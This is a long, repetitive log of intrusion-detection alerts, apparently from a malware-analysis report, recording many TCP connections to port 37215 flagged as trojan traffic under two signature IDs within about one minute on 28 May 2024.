          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466495
          SID:2835222
          Source Port:43818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543612
          SID:2835222
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064891
          SID:2829579
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965029
          SID:2829579
          Source Port:48766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665422
          SID:2829579
          Source Port:39830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214021
          SID:2829579
          Source Port:55496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497423
          SID:2835222
          Source Port:48984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266605
          SID:2835222
          Source Port:35350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145157
          SID:2835222
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369440
          SID:2835222
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182592
          SID:2835222
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678321
          SID:2835222
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324250
          SID:2829579
          Source Port:40652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594728
          SID:2829579
          Source Port:51872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543196
          SID:2835222
          Source Port:38084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272778
          SID:2829579
          Source Port:37452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668979
          SID:2829579
          Source Port:46432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941578
          SID:2835222
          Source Port:51444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228406
          SID:2835222
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326553
          SID:2829579
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729106
          SID:2829579
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615314
          SID:2829579
          Source Port:45218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893354
          SID:2829579
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683631
          SID:2835222
          Source Port:39126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221504
          SID:2835222
          Source Port:54374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842466
          SID:2829579
          Source Port:56446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923005
          SID:2835222
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206935
          SID:2829579
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213687
          SID:2829579
          Source Port:57438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810497
          SID:2835222
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803372
          SID:2829579
          Source Port:34856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594619
          SID:2829579
          Source Port:60038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916794
          SID:2835222
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655525
          SID:2835222
          Source Port:39170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957903
          SID:2835222
          Source Port:32888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168316
          SID:2835222
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415853
          SID:2835222
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890112
          SID:2829579
          Source Port:38072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177494
          SID:2829579
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922809
          SID:2829579
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.420546
          SID:2829579
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943398
          SID:2829579
          Source Port:59000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083443
          SID:2835222
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732042
          SID:2829579
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400610
          SID:2829579
          Source Port:41410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227085
          SID:2835222
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680693
          SID:2829579
          Source Port:49310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048770
          SID:2835222
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530373
          SID:2829579
          Source Port:53432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742394
          SID:2829579
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604383
          SID:2829579
          Source Port:60728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216561
          SID:2835222
          Source Port:46712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208420
          SID:2829579
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321060
          SID:2835222
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499967
          SID:2829579
          Source Port:37784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742301
          SID:2829579
          Source Port:34082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885701
          SID:2835222
          Source Port:42146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594483
          SID:2829579
          Source Port:35772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797372
          SID:2829579
          Source Port:48410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271856
          SID:2829579
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273501
          SID:2829579
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283362
          SID:2829579
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330036
          SID:2835222
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.237163
          SID:2829579
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025903
          SID:2835222
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974012
          SID:2835222
          Source Port:38636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301162
          SID:2835222
          Source Port:41472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796019
          SID:2835222
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173196
          SID:2829579
          Source Port:52182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116719
          SID:2835222
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267966
          SID:2835222
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130709
          SID:2829579
          Source Port:39258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615508
          SID:2829579
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669308
          SID:2829579
          Source Port:42466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810719
          SID:2829579
          Source Port:37250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073940
          SID:2835222
          Source Port:59734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374598
          SID:2835222
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977322
          SID:2829579
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237129
          SID:2835222
          Source Port:59344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663235
          SID:2829579
          Source Port:41292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671598
          SID:2829579
          Source Port:35510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.418042
          SID:2829579
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656614
          SID:2835222
          Source Port:58140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229989
          SID:2835222
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402359
          SID:2829579
          Source Port:38936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942311
          SID:2835222
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941488
          SID:2829579
          Source Port:53064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175768
          SID:2829579
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486302
          SID:2829579
          Source Port:42396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809045
          SID:2835222
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692112
          SID:2829579
          Source Port:46560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339763
          SID:2829579
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064258
          SID:2829579
          Source Port:35774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963122
          SID:2835222
          Source Port:33604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.106014
          SID:2829579
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550101
          SID:2835222
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689778
          SID:2835222
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202585
          SID:2829579
          Source Port:54440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480219
          SID:2829579
          Source Port:34620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672207
          SID:2829579
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590635
          SID:2835222
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114183
          SID:2829579
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810451
          SID:2829579
          Source Port:33442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115992
          SID:2829579
          Source Port:42684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932611
          SID:2829579
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201124
          SID:2835222
          Source Port:36488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401632
          SID:2829579
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222416
          SID:2829579
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653075
          SID:2829579
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672127
          SID:2835222
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240125
          SID:2829579
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.777140
          SID:2835222
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543370
          SID:2829579
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869139
          SID:2829579
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962918
          SID:2829579
          Source Port:56180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048733
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684990
          SID:2835222
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891920
          SID:2835222
          Source Port:54696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609503
          SID:2835222
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726670
          SID:2829579
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142627
          SID:2835222
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191968
          SID:2829579
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593000
          SID:2829579
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272693
          SID:2835222
          Source Port:58352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984968
          SID:2829579
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299387
          SID:2829579
          Source Port:47750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550653
          SID:2835222
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667028
          SID:2835222
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.093095
          SID:2835222
          Source Port:43276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908024
          SID:2829579
          Source Port:39800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399648
          SID:2829579
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608881
          SID:2829579
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114466
          SID:2835222
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143635
          SID:2835222
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891430
          SID:2835222
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944975
          SID:2829579
          Source Port:36934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680368
          SID:2835222
          Source Port:53192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618527
          SID:2835222
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923617
          SID:2835222
          Source Port:55350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216823
          SID:2835222
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664301
          SID:2835222
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739671
          SID:2835222
          Source Port:46022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711270
          SID:2835222
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317269
          SID:2829579
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248028
          SID:2835222
          Source Port:38836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485007
          SID:2829579
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246063
          SID:2835222
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044521
          SID:2829579
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267584
          SID:2835222
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464173
          SID:2829579
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209120
          SID:2835222
          Source Port:54722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313320
          SID:2829579
          Source Port:50028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305637
          SID:2829579
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416038
          SID:2829579
          Source Port:32924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820225
          SID:2835222
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326777
          SID:2835222
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196271
          SID:2829579
          Source Port:35468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709150
          SID:2829579
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960269
          SID:2835222
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627727
          SID:2829579
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764567
          SID:2835222
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280836
          SID:2835222
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152514
          SID:2829579
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466262
          SID:2829579
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196728
          SID:2829579
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140201
          SID:2829579
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476505
          SID:2829579
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922705
          SID:2829579
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475343
          SID:2829579
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733385
          SID:2835222
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710750
          SID:2829579
          Source Port:59142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146032
          SID:2835222
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476482
          SID:2829579
          Source Port:51058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225478
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150760
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485639
          SID:2829579
          Source Port:52172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974008
          SID:2829579
          Source Port:33122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068596
          SID:2829579
          Source Port:54886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225802
          SID:2829579
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216340
          SID:2835222
          Source Port:53084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435602
          SID:2835222
          Source Port:45320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147392
          SID:2829579
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2829579
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547582
          SID:2835222
          Source Port:60888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979306
          SID:2829579
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537426
          SID:2829579
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843382
          SID:2835222
          Source Port:45106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272797
          SID:2835222
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914330
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652414
          SID:2829579
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551095
          SID:2829579
          Source Port:46806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855161
          SID:2835222
          Source Port:40288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291552
          SID:2835222
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625644
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536763
          SID:2829579
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117051
          SID:2829579
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
